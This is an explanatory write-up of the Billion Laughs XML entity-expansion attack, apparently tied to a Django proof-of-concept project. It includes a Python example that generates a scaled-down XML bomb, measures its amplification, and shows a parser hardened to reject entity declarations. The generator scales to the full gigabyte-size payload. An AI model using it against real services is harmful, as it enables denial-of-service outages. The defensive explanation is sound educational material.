h4ck-billionlaughs-django is an open source POC (Proof Of Concept) of the Billion Laughs Attack, one of the most dangerous attacks against XML parsers. Despite how it is sometimes categorized, it is not code injection: no attacker code ever runs. It is a resource-exhaustion (denial-of-service) attack built from nothing but nested XML entity declarations.
The Billion Laughs attack is a denial-of-service attack that targets XML parsers. It is also known as an XML bomb or, more formally, the exponential entity expansion attack: a small document declares a chain of entities, each of which references the previous one ten times, so that a payload of under a kilobyte expands to gigabytes of text when the parser resolves the final reference. A Billion Laughs document is well-formed XML and can even pass XML schema validation, because the bomb lives in the DTD rather than in the element content a schema checks. For this reason it can be tricky to work out how to mitigate the threat when working with different XML parsers: the only reliable defenses are to have the parser refuse DTDs or entity declarations altogether, or to enforce a hard cap on how much text entity expansion may produce.
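The following is an added example and is not code from the h4ck-billionlaughs-django project. It builds a scaled-down Billion Laughs payload with Python's standard-library expat bindings (the same parser behind `xml.etree` and `xml.sax`, which a Django view receiving XML would typically use), measures how much character data the unprotected parser actually produces, and then shows a hardened parser that refuses any entity declaration in the DTD. The depth and fan-out parameters are deliberately small so it runs in milliseconds; the function names and the `EntityDeclarationRejected` exception are this example's own, not part of the project.

```python
"""Billion Laughs: construct a (small) bomb, measure its expansion, and reject it."""
import xml.parsers.expat


def billion_laughs_payload(depth=4, fanout=10):
    """Construct a Billion Laughs document.

    lol0 is the literal "lol"; lolN references lol(N-1) `fanout` times, so the
    root element's single &lolN; reference expands to fanout**depth copies.
    The classic attack uses depth=9, fanout=10 (a billion "lol"s, ~3 GB);
    the defaults here are kept small on purpose so the demo is cheap to run.
    """
    entities = ['<!ENTITY lol0 "lol">']
    for n in range(1, depth + 1):
        entities.append('<!ENTITY lol%d "%s">' % (n, "&lol%d;" % (n - 1) * fanout))
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE lolz [\n" + "\n".join(entities) + "\n]>\n"
        "<lolz>&lol%d;</lolz>" % depth
    )


def expanded_text_length(doc):
    """Parse with a plain expat parser and return how many characters of
    element text the parser delivered. For a bomb this is the amplified size."""
    total = 0

    def on_chars(data):
        nonlocal total
        total += len(data)

    parser = xml.parsers.expat.ParserCreate()
    parser.CharacterDataHandler = on_chars
    parser.Parse(doc, True)
    return total


def amplification_factor(doc):
    """Ratio of expanded text to the size of the document on the wire."""
    return expanded_text_length(doc) / len(doc)


class EntityDeclarationRejected(ValueError):
    """Raised when a document tries to declare any entity in its DTD."""


def parse_without_entities(doc):
    """Hardened parse: refuse every entity declaration (internal or external)
    before a single reference can be expanded, then return the element text.

    Legitimate application payloads almost never need custom entities, so the
    simplest robust mitigation is to reject the declaration itself rather than
    trying to estimate expansion cost. This mirrors the approach taken by
    entity-rejecting wrappers around expat, implemented here by hand.
    """
    chunks = []

    def on_entity_decl(name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        raise EntityDeclarationRejected(
            "refusing XML entity declaration %r (possible entity-expansion attack)" % name
        )

    def on_chars(data):
        chunks.append(data)

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl  # fires while the DTD is read
    parser.CharacterDataHandler = on_chars
    parser.Parse(doc, True)
    return "".join(chunks)


if __name__ == "__main__":
    bomb = billion_laughs_payload(depth=4, fanout=10)
    print("payload bytes: %d, expanded chars: %d, amplification: %.0fx"
          % (len(bomb), expanded_text_length(bomb), amplification_factor(bomb)))
    try:
        parse_without_entities(bomb)
    except EntityDeclarationRejected as exc:
        print("hardened parser:", exc)
    print("benign document:", parse_without_entities("<r>hello</r>"))
```

With depth 4 the 10,000-copy expansion is about 30 KB, which is already roughly 60 times the size of the document that produced it; every extra level multiplies that by ten, and the parser does all of the work before the application sees a single byte of element text. Note that recent expat releases ship their own amplification limit, but it only activates once the output passes a size threshold of several megabytes, so a request that stays under it still costs the server far more than it cost the attacker; rejecting the DTD, as above, is the dependable fix.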
Make this ...